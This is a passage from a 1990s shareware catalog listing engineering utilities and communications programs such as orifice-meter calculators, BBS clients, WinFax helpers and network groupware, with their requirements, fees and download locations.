on page 503. + + + 9.7 Engineering utilities + + Product: AGA (Orifice meters) + Author: NorDecor (Bjarne K. Berge) + Version: 4.0 (06-01-96) + Needs: IBM 80386, Windows 3.0 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP LaserJet printer; Epson printer; math + coprocessor. + Registration fee: $19.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + + Chapter 9, "Engineering" 349 + + + + 12-month free upgrading allowed. 1 free update disk(s) sent + out. + Look for: availability unknown on BBSs; AGA.ZIP on CompuServe in + CIS:0 forum LIBrary 0 (or contact userID 101653,3544 for + assistance). + Download size: 540k (about 40 minutes with a 2400 baud modem) + Description: + Calculates size, flowrate or pressure drops for gas and liquid + orifice meters. Calculations are based on AGA Report No. 3 + (ANSI/API 2530 - 1992). U.S. and SI units. Both DOS and + Windows versions supplied upon registration. + + + Product: Beam Cookbook + 2D beam solver - linear elastic systems. See full description + on page 345. + + Product: CALC_JNC + The ultimate TSR programmers calculator. See full description + on page 117. + + Product: Convert It!(tm) SE + Versatile unit of measure converter. See full description on + page 317. + + Product: GasWat (Gas-Water Interactions) + Author: NorDecor (Bjarne K. Berge) + Version: 4.0 (06-01-96) + Needs: IBM 80386, Windows 3.0 or better. 512k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP LaserJet printer; Epson printer; math + coprocessor. + Registration fee: $19.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products. 12-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; GASWAT.ZIP on CompuServe + in CIS:0 forum LIBrary 0 (or contact userID 101653,3544 for + assistance). + Download size: 540k (about 40 minutes with a 2400 baud modem) + Description: + Natural gas - Water interaction calculations. Calculates + hydrate formation conditions, water content of natural gas, + MeOH/Glycol injection rates to protect gas-pipelines from + hydrate formation and CO2 solid formation conditions. + Calculations performed for gases with known composition and + gases with only known gas-gravity. U.S. and SI-units + supported. Both DOS and Windows versions supplied upon + registration. + + Chapter 9, "Engineering" 350 + + + + Product: GOW (Gas-Oil-Water properties) + Author: NorDecor (Bjarne K. Berge) + Version: 4.0 (01-06-96) + Needs: IBM 80386, Windows 3.0 or better. 512k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse; Epson printer; + VBRUN300.DLL. + Strongly recommended: math coprocessor. + Registration fee: $19.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products. 12-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; GOW.ZIP on CompuServe in + CIS:0 forum LIBrary 0 (or contact userID 101653,3544 for + assistance). + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + Calculates physical properties of gases (Natural gas, Nitrogen + and Air) and liquids (Oil, Water, MeOH, MEG, DEG, TEG). More + than 12 properties are calculated for each gas or liquid + (Density, Viscosity, Bubble point, etc.). U.S. and SI units. + Both DOS and Windows versions supplied upon registration. + + + Product: I&M USA + Author: C T Johnson, Inc, 704-568-9598 + Version: 1.05 (05-05-94) + Needs: IBM AT (80286), DOS 3.2 or better. 1000k RAM; CGA + monitor; Hercules monitor; Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Epson printer. + Strongly recommended: Hayes-compatible modem; EMS memory. + Registration fee: $39.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 12 months of + unlimited phone, fax, BBS, CompuServe, mail support; 2-month + return policy; LAN license; site license; bonus data; all ASP- + wide offers (see page 6); disks of other shareware. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: CTJII&.* on BBSs (multiple files) (call 704-532-1236 to + download it at no charge); CTJII&.* on CompuServe in CIS:LEAP + forum LIBrary 4 (multiple files) (or contact userID 72760,1020 + for assistance). + SWREG#: 3478 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Process controls directory of manufacturers cross referenced to + Instrument devices, representatives and distributors. Allows + you to look up a device and lists all manufacturers, then you + select a Mfr and it shows you the rep or distributor. You + enter the records and link them through pop-up windows and it + is all menu driven. You can build a relational database for + + Chapter 9, "Engineering" 351 + + + + any products or catagories, however, this version includes + catagories for instruments, most US Engr Assn and Instrument + Tech journals. + + + Product: INSTINDX + Instr index, prints lists and data sheets. See full + description on page 343. + + Product: INSTSPEC + Author: C T Johnson, Inc, 704-568-9598 + Version: 1.0 (05-05-93) + Needs: IBM AT (80286), DOS 3.2 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + CGA monitor; Hercules monitor; HP DeskJet printer; HP LaserJet + printer; Epson printer. Lotus v2.x, Allways or WYSIWYG. + Strongly recommended: Dual 720k floppy drives; Postscript + printer. + Registration fee: $20.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; 51/4" master disk(s); 12 + months of unlimited fax, BBS, CompuServe, mail support; 2-month + return policy; site license; all ASP-wide offers (see page 6); + disks of other shareware. 12-month free upgrading allowed. + Look for: INSTSPEC.EXE on BBSs (call 704-532-1236 to download it + at no charge); INSPEC.EXE on CompuServe in CIS:LEAP forum + LIBrary 4 (or contact userID 72760,1020 for assistance). + SWREG#: 3480 + Download size: 160k (about twelve minutes with a 2400 baud modem) + Description: + Produce professional looking process controls instrument data + sheets for purchasing and engineering design. Based on ISA + outdated manual entry forms, but, updated for modern controls. + Uses DTP fonts to give professional appearence, not just ASCII + text. Made for HP Laser, but, works with dot matrix if you + presently have Lotus Allways or WYSIWYG. 35 Templates in all + from annunciators through control valves. + + + Product: ISO (Orifice meters) + Author: NorDecor (Bjarne K. Berge) + Version: 4.0 (06-01-96) + Needs: IBM 80386, Windows 3.0 or better. 512k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: HP LaserJet printer; Epson printer; math + coprocessor. + Registration fee: $19.95 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + + Chapter 9, "Engineering" 352 + + + + page 6); discounts on other products. 12-month free upgrading + allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; ISO.ZIP on CompuServe in + CIS:0 forum LIBrary 0 (or contact userID 101653,3544 for + assistance). + Download size: 540k (about 40 minutes with a 2400 baud modem) + Description: + Calculates size, flowrate or pressure drops for gas and liquid + orifice meters. Calculations are based on International + Standard ISO-5167-1:1991. U.S. and SI-units. Both DOS and + Windows versions are supplied upon registration. + + + Product: Judy's TenKey + Powerful, flexible Windows calculator. See full description on + page 118. + + Product: PLOTTER + Data plotting and analysis program. See full description on + page 383. + + Product: SmartDraw + Drag & drop flowcharting & draw for Windows. See full + description on page 500. + + Product: SmartDraw 95 + Drag & drop flowcharting & draw for Windows. See full + description on page 500. + + Product: Steam Properties + Helpful for analyzing power plants. See full description on + page 346. + + Product: TURBO TPU TOOLKIT! + Pascal math function toolkit. See full description on + page 422. + + Product: Units & Volumes + Excel add-in, unit conv. & tank volumes. See full description + on page 219. + + 9.7.1 File format translators + + Product: REALIZE + Full converter from .DXF to POV raytracer. See full + description on page 498. + + Chapter 9, "Engineering" 353 + + + + 9.8 Software tools & add-ins + + 9.8.1 For multiple programs + + Product: Playground + Tool for building object models. See full description on + page 386. + + 9.8.2 For other + + Product: Nominal Pipe Size for Windows + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 2.1 (03-28-94) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $29.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, GEnie, mail support. 3-month + free upgrading allowed. + Look for: availability unknown on BBSs; PIPEW2.EXE on CompuServe + in CIS:PCAPP forum LIBrary 13 (or contact userID 72060,1153 for + assistance). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Displays dimensional, weight and flow capacity data for a wide + range of piping materials and sizes (over 3000 sizes of + standard and specialty pipes in over 25 materials). A must for + all piping engineers and students. + + + Product: NPS - Nominal Pipe Size + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 2.1 (10-01-92) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $29.95 + Registration benefits: 3 months of support. 2-month free + upgrading allowed. + Look for: availability unknown on BBSs; PIPE2.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 13 (or contact userID 72060,1153 for + assistance). + Download size: 97k (about seven minutes with a 2400 baud modem) + Description: + Displays dimensional, weight and flow capacity data for a wide + range of piping materials and sizes. (Over 2000 sizes of + standard and specialty pipes in over 25 different materials). + Easy to use menu driven format with user selectable dimensional + units (US, Imperial or metric) and display colors. A must for + all piping engineers and students. + + Chapter 9, "Engineering" 354 + + + + 9.9 Other + + Product: DXF Bill of Materials Generator + Author: Annabec Business Services, 216-674-5444 + Version: DOS1.00 (03-01-95) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Postscript printer; Epson + printer. + Registration fee: $33.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of phone, fax, CompuServe, mail support; discounts on + upgrades. 12-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: availability unknown on BBSs; ANNA-BOM.ZIP on + CompuServe in CIS:ACAD forum LIBrary 10 (or contact userID + 75452,3723 for assistance). + SWREG#: 4335 + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + Generates bills of materials (BOM) from AutoCAD DXF files. The + system counts "Blocks" any of which may be included or excluded + in the BOM. TAGs may be inserted & edited in the descriptions. + The descriptions are fully editable as are the BOM page and + column headers. Context sensitive, on-line help is available + for most operations. The generator prints the BOM or saves it + as a delimited file. + + Chapter 10, "Communications" 355 + + + + + + Chapter 10 + Communications + + + 10.1 General-purpose modem communications + + Product: BBS Access Communications + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 2.25 (01-01-96) + Needs: IBM PC, DOS 2.0 or better. 320k RAM; Modem. + Strongly recommended: CGA monitor; Hercules monitor; Dual 720k + floppy drives; Hard disk; Hayes-compatible modem; Mouse. + Registration fee: $29.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: BBS225.ZIP on BBSs (call 216-661-9065 to download it at + no charge); BBS225.ZIP on CompuServe in CIS:PCCOM forum LIBrary + 3 (or contact userID 73057,3113 for assistance); BBS225.ZIP on + GEnie in IBMPC forum LIBrary 0. + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A general communications program for uploading and downloading + files to/from bulletin board systems. Many protocols including + ASCII, Xmodem, Ymodem, Zmodem, and Kermit with multiple + variations. Keeps of track of last time each BBS called and + how long spent on each one. Easy to set up and use. + + + Product: CTS Serial Port Utilities + Serial port diagnositic and control utilities. See full + description on page 71. + + Product: FAXHAVEN + HQFAX ver 2 PLUS one-touch FAX receive help. See full + description on page 373. + + Product: HQ-FAX (1-Step High Quality FAX + One-step high quality FAX. See full description on page 374. + + Chapter 10, "Communications" 356 + + + + Product: Link + Author: Target Software (Robert Brinegar), +81-3-3207-4553 + Version: 2.1 (05-01-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hayes- + compatible modem; Mouse; XMS memory; VBRUN300.DLL. + Strongly recommended: Network (LAN). + Registration fee: $20.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + Look for: LINK.ZIP on BBSs; LINK.ZIP on GEnie in 1212 forum + LIBrary 0. + SWREG#: 4204 + PsL#: 14098 + Download size: 162k (about twelve minutes with a 2400 baud modem) + Description: + Connects your communications program to your callback service. + It will automize the connect procedure and start your + communications program allowing you to swiftly connect to your + server. You can also voice dial, time your calls and keep a + record of both voice and computer time. You can also print your + records. + + + Product: ModemSta + Iconic status indicator for Windows. See full description on + page 376. + + Product: Open Menu + Flexible fast general purpose menu program. See full + description on page 152. + + Chapter 10, "Communications" 357 + + + + Product: wfListen + Author: Prodigy Computing + Version: 3.31 (11-05-95) + Needs: IBM AT (80286), Windows 3.1 or better. Modem. WinFax Pro + (version 2 or 3) or WinFax Lite. + Strongly recommended: Mouse. + Registration fee: $6.00 + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support; 3-month limited return policy; all ASP-wide + offers (see page 6); discounts on other products. Lifetime + free upgrading allowed. + Look for: WFLIS300.ZIP on BBSs (multiple files) (call + 909-681-6221 to download it at no charge); WFLISN.ZIP on + CompuServe in CIS:SYMWIN forum LIBrary 16 (multiple files) (or + contact userID 73770,660 for assistance). + SWREG#: 2113 + Download size: 233k (about 18 minutes with a 2400 baud modem) + Description: + For fax-modem owners who use WinFax Pro from Delrina, and who + also use a DOS- or Windows-based comms program. It disables and + re-enables WinFax auto receive (AR). This is useful with comms + programs because they require you to disable AR while they are + running, and it's easy to forget to switch AR back on. Will + silently disable AR, launch your comms program, wait for it to + finish, and then re-enable AR. Optional installable languages: + French and German. + + + Product: wfStatus + Author: Prodigy Computing + Version: 1.20 (11-11-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk; Modem. + WinFax Pro version 2, 3 or 4; or WinFax Lite. + Strongly recommended: Mouse. + Registration fee: $5.00 + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support; 3-month limited return policy; all ASP-wide + offers (see page 6); discounts on other products. Lifetime + free upgrading allowed. + Look for: WFSTAT10.ZIP on BBSs (call 909-681-6221 to download it + at no charge); WFSTAT.ZIP on CompuServe in CIS:SYMWIN forum + LIBrary 16 (or contact userID 73770,660 for assistance). + SWREG#: 3974 + Download size: 492k (about 37 minutes with a 2400 baud modem) + Description: + A little added feature for WinFax Pro users. It's easy to leave + WinFax with auto-receive switched off accidentally. Solves the + problem by changing the WinFax icon. This way, you can see + whether WinFax has auto-receive on or off, even when WinFax is + iconized. You can even customize the icons. Works only on the + in-memory copy of WinFax: does not patch your Delrina + executable files. + + Chapter 10, "Communications" 358 + + + + Product: WinNET Mail for MS Windows + Author: COMPUTER WITCHCRAFT, INC., 502-589-6800 + Version: 2.11 (03-24-94) + Needs: IBM 80386, Windows 3.1 or better. 1024k RAM; EGA monitor; + Hard disk; Modem. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $99.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, mail support; lifetime limited return policy; + bonus utilities; all ASP-wide offers (see page 6); disks of + other shareware. Lifetime free upgrading allowed. + Look for: WNMAIL??.ZIP on BBSs; WNMAIL.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 76130,1463 for + assistance). + Download size: 700k (about 52 minutes with a 2400 baud modem) + Description: + A Windows MDI application that provides access to any Internet/ + Usenet UUCP service. Account setup with WinNET service is + automatic and the software is extremely easy to use with point + and click functionality and low cost 800 number access. Full + access to 6000+ news groups including Clarinet and alt groups. + Has integrated mail and article threading news reader, 14.4KB + v.42bis store forward connect, dial-up scheduler, on-line help, + integrated uuencode/decode, and user-definable folders, and + more. + + + 10.2 Service-specific programs + + Product: Link + Connects program to callback service. See full description on + page 355. + + 10.2.1 For CompuServe + + Product: PC Chart + Charting program for stocks & commodities. See full + description on page 322. + + Chapter 10, "Communications" 359 + + + + Product: Recon + Author: Amdox Corp. (Orest Skrypuch) + Version: 2.50 (09-19-94) + Needs: IBM PC, DOS 2.0 or better. 640k RAM; CGA monitor; Hard + disk. + Strongly recommended: EGA monitor; EMS memory; XMS memory. + Registration fee: $38.00 (add $7.00 for shipping to U.S. + addresses) (add $7.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited CompuServe support; bonus + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. + Look for: RECON.ZIP on BBSs (multiple files); RECON.ZIP on + CompuServe in CIS:TAPCIS forum LIBrary 2 (multiple files) (or + contact userID 76672,1273 for assistance). + Download size: 270k (about 20 minutes with a 2400 baud modem) + Description: + CompuServe message file manager, with message/reply editor & + script generator, pulldown menus & command line mode. New + PreScan summary for files. Handles forum messages, CMail & + INTERNET. Keeps files trimed and sorted into context, Menu + SHELL organizes your navigator & add-ons. Sysop commands, + changes immediately reflected in file. Powerful file navigation + & viewing, multiple sorts, duplicate deletion, filters, search, + print, edit, delete, move or auto-age messages. Context + sensitive help. + + + 10.2.2 For GEnie + + Product: Alad_IRQ + Author: Computer Telecommunication Systems, Inc. (John Jerrim), + 404-263-8623 + Version: 1.0 (12-27-93) + Needs: IBM PC, DOS 2.1 or better. 8k RAM; Program can run safely + on a system with no hard disk and only one floppy disk drive. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, + GEnie, mail support; bonus utilities; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + 12-month free upgrading allowed. + Look for: ALAIRQ10.EXE on BBSs; ALAIRQ10.EXE on GEnie in + ALADDINSUP forum LIBrary 2 (or contact userID J.JERRIM for + assistance). + Download size: 31k (about three minutes with a 2400 baud modem) + Description: + Allows the GEnie Aladdin software to use any IRQ (2-7, 9-12, 14 + or 15) supported by your serial port or modem. Creates a run- + time environment for Aladdin that uses 8k of RAM. + + Chapter 10, "Communications" 360 + + + + Product: PC Chart + Charting program for stocks & commodities. See full + description on page 322. + + 10.2.3 For Internet + + Product: WebForms + Author: Q&D Software Development (Dave Verschleiser), + 201-635-1824 + Version: 1.0h (06-15-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse; VBRUN300.DLL. + Strongly recommended: Modem. + Registration fee: $19.95 (add $3.95 for shipping to U.S. + addresses) (add $4.95 for shipping to Canadian addresses) (add + $4.95 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, CompuServe, mail support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: WBFRM10H.ZIP on BBSs; WBFRM.ZIP on CompuServe in + CIS:WINAPD forum LIBrary 1 (or contact userID 76336,3271 for + assistance). + SWREG#: 6011 + PsL#: 14064 + Download size: 1000k (about 74 minutes with a 2400 baud modem) + Description: + Lets you create HTML forms for posting on the World Wide Web + with no prior HTML knowledge! Consists of two modules. The + Forms Generator, lets you design the form to your + specifications and creates the HTML file automatically. Then + you just upload the form to your Web Server and wait for the + responses to roll in to your Internet mailbox. The Response + Reader decodes the messages you receive and loads them into a + table for easy viewing. Great for order-taking! + + + Product: WebParse + Author: Informatik Inc., 610.640.0339 + Version: 1.4 (12-15-95) + Needs: IBM PC, Windows 3.0 or better. VBRUN300.DLL. + Registration fee: $19.00 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $3.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe support; 3-month return + policy; all ASP-wide offers (see page 6); discounts on other + + Chapter 10, "Communications" 361 + + + + products; discounts on upgrades. 12-month free upgrading + allowed. + Look for: availability unknown on BBSs; WEBPAR.ZIP on CompuServe + in CIS:INTERNET R forum LIBrary 9 (or contact userID 76534,1166 + for assistance). + SWREG#: 7260 + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + Extract, parse, convert and format the web mailto messages in + e-mail inbox files to comma-delimited ASCII text for easy + import to databases. Extracted data can also be viewed as a + spreadsheet. Versatile and easy to use. + + + 10.3 Bulletin boards + + Product: ES-NEWS + Network login news manager. See full description on page 363. + + Product: Notice Board + Notice board/information system for LANs. See full description + on page 371. + + Product: x-FORUM3 + Network message forum system. See full description on + page 366. + + Product: x-FORUM4 + Network message forum system for Windows. See full description + on page 367. + + Product: x-NEWS3 + Network news login system. See full description on page 372. + + 10.3.1 Bulletin board utilities + + Product: BBS Access Communications + BBS communications for uploading/downloading. See full + description on page 355. + + Product: Medieval War Door + Author: Burnham Park Software, Inc., 312-922-6313 + Version: 1.0 (02-21-95) + Needs: IBM PC, DOS 2.1 or better. 640k RAM; CGA monitor; Hard + disk. + Registration fee: $22.00 (add $1.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); lifetime unlimited + phone, BBS, CompuServe, mail support; all ASP-wide offers (see + + Chapter 10, "Communications" 362 + + + + page 6); discounts on other products; discounts on upgrades. + Lifetime free upgrading allowed. + Look for: MEDOOR10.ZIP on BBSs (call 312-922-2839 to download it + at no charge); MEDOO*.ZIP on CompuServe in CIS:PCBBS forum + LIBrary 4 (or contact userID 71532,3271 for assistance). + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + A BBS door game of medieval war/strategy. From 2-6 players + compete on a map of up to 100 x 100 and up to 50 games may be + played simultaneously. Almost any BBS may be configured to play + it including PCBoard and Wildcat! + + + 10.4 Networks + + See also: Utilities, Menu systems & file managers. + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 94. + + Product: ES-NEWS + Author: Extensions Software Corporation, 407-344-3322 + Version: 2.29 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; CGA monitor; Hard + disk. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; ESNEWS.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4279 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Provides for login new and bulletin display per predefined + news/user groups. Includes built-in administration of news + text, display options, and user groups. Network-aware of both + Banyan VINES(R) and Novell NetWare(R). + + + Product: The MetaKit Library [***] + C++ classes for persistent structured data. See full + description on page 387. + + Chapter 10, "Communications" 363 + + + + Product: Power Edit + Author: Target Software (Robert Brinegar), +81-3-3207-4553 + Version: 2.02 (06-15-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Network + (LAN); XMS memory; VBRUN300.DLL. + Strongly recommended: Mouse; sound card. + Registration fee: $35.00 (add $10.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 6 months of phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). 6-month free upgrading allowed. + Look for: POWREDIT.ZIP on BBSs; POWREDIT.ZIP on GEnie in 1213 + forum LIBrary 0. + SWREG#: 5674 + PsL#: 14096 + Download size: 331k (about 25 minutes with a 2400 baud modem) + Description: + A powerful network tool allowing spellchecking, file + encryption, sending and viewing Email and advanced editing + options. Plus full control of desktop including fonts, sounds + and colors. Opens numerous file types and gives user control + over his network Email. Customizable toolbar with ruler and + multiple statusbars. + + + Product: Search-N-Store + Fast network or standalone database. See full description on + page 223. + + Product: x-CAL3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 3.31 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XCAL3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1110 + PsL#: 10884 + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Features private, alternate, and workgroup calendaring with + meeting scheduler, online help, TSR option, and x-CAL3 + administration. Easy-to-use and network-aware of both Banyan + VINES(R) and Novell NetWare(R). + + Chapter 10, "Communications" 364 + + + + Product: x-CON3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.44 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: printed manual; 31/2" master disk(s); + lifetime phone, fax, CompuServe, newsletter, mail support; LAN + license; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XCON3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1123 + PsL#: 10885 + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Features up to 99 different contact groups (including private), + user security per group, configurable prompts, TSR mode, online + help, and x-CON3 administration. Easy-to-use and network-aware + of both Banyan VINES(R) and Novell NetWare(R). + + + Product: x-FILE3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.74 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFILE3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1124 + PsL#: 10886 + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Allows controlled access to public files with selectable + upload/download access, filtered listings, TSR mode, online + help, and x-FILE3 administration. Easy-to-use and network-aware + of both Banyan VINES(R) and Novell NetWare(R). + + Chapter 10, "Communications" 365 + + + + Product: x-FONE3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 2.18 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFONE3.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1111 + PsL#: 10887 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Features custom-defined prompts, display sorts, TSR mode, + online help, built-in security levels, and x-FONE3 + administration. Easy-to-use and network-aware of both Banyan + VINES(R) and Novell NetWare(R). + + + Product: x-FONE4 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.25 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; HP LaserJet printer; Mouse. + Strongly recommended: Network (LAN). + Registration fee: $249.00 + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); lifetime phone, fax, + CompuServe, newsletter, mail support; LAN license; site + license; all ASP-wide offers (see page 6); disks of other + shareware. Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; XFONE4.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 4280 + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Features custom-defined prompts, display sorts, online help, + multi-level security, display update, import options, and + built-in x-FONE4 administration. Low-cost, easy-to-use, and + simple-to-manage. Network-aware of both Novell NetWare(R) and + Banyan VINES(R). + + Chapter 10, "Communications" 366 + + + + Product: x-FORUM3 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.28 (05-01-95) + Needs: IBM PC, DOS 3.1 or better. 384k RAM; Hard disk. + Strongly recommended: Network (LAN). + Registration fee: $132.50 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime phone, fax, CompuServe, + newsletter, mail support; LAN license; all ASP-wide offers (see + page 6); disks of other shareware. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; XFORUM.EXE on CompuServe + in CIS:NVENB forum LIBrary 18 (or contact userID 72007,571 for + assistance). + SWREG#: 1311 + PsL#: 10942 + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + A workgroup conferencing system offering up to 26 message + forums, interactive or read-only forum types, message create/ + read/reply, new message indicators, TSR mode, online help, and + x-FORUM3 administration. Easy-to-use and network-aware of + Banyan VINES(R) and Novell NetWare(R). + + + Product: x-FORUM4 + Author: Extensions Software Corporation, 407-344-3322 + Version: 1.12 (06-18-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA 